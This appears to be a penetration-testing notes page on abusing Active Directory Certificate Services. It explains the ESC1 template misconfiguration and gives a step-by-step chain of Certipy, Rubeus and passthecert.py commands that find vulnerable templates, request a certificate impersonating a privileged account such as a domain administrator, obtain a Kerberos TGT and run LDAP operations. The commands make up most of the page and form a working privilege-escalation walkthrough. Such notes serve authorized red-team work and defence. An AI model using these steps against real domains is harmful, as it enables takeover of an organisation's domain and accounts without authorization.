Certificates in AD
Read the Certified Pre-Owned white-paper to understand certificates and their attack vectors
Certipy
Certipy is incomptible with Python 3.11 and greater atm. A quick solution is found here
To enumerate AD for vulnerable certifications, we can utilize this command:
sudo certipy-ad find -u 'user@domain' -dc-ip <dc-ip> -vulnerable -enabled
Certipy outputs the configuration details of interest in JSON and TXT files following the naming convention "<DATE-TIMESTAMP>_Certipy"
ESC1
A certificate template with the ESC1 vulnerability allows low-privileged users to enroll and request a certificate for any domain object specified by the user. This means that any user with enrollment rights can request a certificate for a privileged account, such as a domain administrator.
Vulnerable templates have the following configurations:
Client Authentication: True
Enabled: True
Enrollee Supplies Subject: True
Requires Management Approval: False
Authorized Signatures Required: 0
The Certipy command required to request a certificate includes the following arguments:
-u : username
-p : compromised user password
-dc-ip : domain controller IP address
-target : target CA (Certificate Authority) DNS (Domain Name System) Name
-ca : short CA Name
-template : vulnerable template name
-upn : target user/object name
The full Certipy command is shown below:
sudo certipy-ad req -u 'user@domain' \
-dc-ip '<dc-ip>' \
-target 'foobar-CA.foobar.com' \
-ca 'foobar-CA' \
-template 'FOO_Templ' \
-upn 'target_user@damin'
If everything goes well you'll get a certificate <target_user>.pfx which can then be used to request a TGT.
With Rubeus:
Rubeus.exe asktgt /user:<target_user> /certificate:<path_to_cert>.pfx /domain:<domain> /dc:<domain-controller>
With Certipy:
sudo certipy-ad auth -pfx '<path_to_cert>.pfx' -username '<target_user>' -domain '<domain>' -dc-ip '<dc-ip>'
Note that if you get the error "KDC_ERR_PADATA_TYPE_NOSUPP" - PKINIT is not available. You can then instead try to connect with LDAP directly.
If you use Certipy to retrieve certificates, you can extract key and cert from the pfx by using:
certipy-ad cert -pfx user.pfx -nokey -out user.crt
certipy-ad cert -pfx user.pfx -nocert -out user.key
Then we can use passTheCert.py to perform different LDAP operations.
sudo python3 passthecert.py -action whoami -crt user.cert -key user.key -domain <domain> -dc-ip <dc-ip>
Last updated